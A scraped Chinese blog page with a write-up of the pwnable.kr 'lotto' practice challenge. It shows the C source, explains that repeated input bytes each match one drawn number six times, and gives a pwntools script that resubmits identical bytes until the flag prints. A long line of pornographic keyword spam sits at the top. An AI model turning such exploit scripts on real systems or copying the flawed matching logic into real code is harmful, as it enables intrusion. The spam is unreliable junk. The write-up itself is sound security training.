日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

pwnable.kr lotto题解

發(fā)布時間:2025/3/21 编程问答 20 豆豆
生活随笔 收集整理的這篇文章主要介紹了 pwnable.kr lotto题解 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

ssh lotto@pwnable.kr -p2222 (pw:guest)
題目源碼:

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h>unsigned char submit[6];void play(){int i;printf("Submit your 6 lotto bytes : ");fflush(stdout);int r;r = read(0, submit, 6);printf("Lotto Start!\n");//sleep(1);// generate lotto numbersint fd = open("/dev/urandom", O_RDONLY);if(fd==-1){printf("error. tell admin\n");exit(-1);}unsigned char lotto[6];if(read(fd, lotto, 6) != 6){printf("error2. tell admin\n");exit(-1);}for(i=0; i<6; i++){lotto[i] = (lotto[i] % 45) + 1; // 1 ~ 45}close(fd);// calculate lotto scoreint match = 0, j = 0;for(i=0; i<6; i++){for(j=0; j<6; j++){if(lotto[i] == submit[j]){match++;}}}// win!if(match == 6){system("/bin/cat flag");}else{printf("bad luck...\n");}}void help(){printf("- nLotto Rule -\n");printf("nlotto is consisted with 6 random natural numbers less than 46\n");printf("your goal is to match lotto numbers as many as you can\n");printf("if you win lottery for *1st place*, you will get reward\n");printf("for more details, follow the link below\n");printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");printf("mathematical chance to win this game is known to be 1/8145060.\n"); }int main(int argc, char* argv[]){// menuunsigned int menu;while(1){printf("- Select Menu -\n");printf("1. Play Lotto\n");printf("2. Help\n");printf("3. Exit\n");scanf("%d", &menu);switch(menu){case 1:play();break;case 2:help();break;case 3:printf("bye\n");return 0;default:printf("invalid menu\n");break;}}return 0; }

在驗證的時候有個漏洞,循環(huán)匹配的時候如果我們輸入的是重復的6個數(shù)字,比如6個1,那個lotto隨機隊列里面只要有一個1就會重復匹配6次。
payload:

from pwn import * s= ssh(host='pwnable.kr',user='lotto',password='guest',port=2222) p = s.process("/home/lotto/lotto") print p.recv() p.sendline('1') print p.recv() lotto = chr(9)*6 p.sendline(lotto) print p.recv() while True:p.sendline('1')print p.recv()p.sendline(lotto)back = p.recv()if "bad luck" not in back:print backbreak

總結

以上是生活随笔為你收集整理的pwnable.kr lotto题解的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。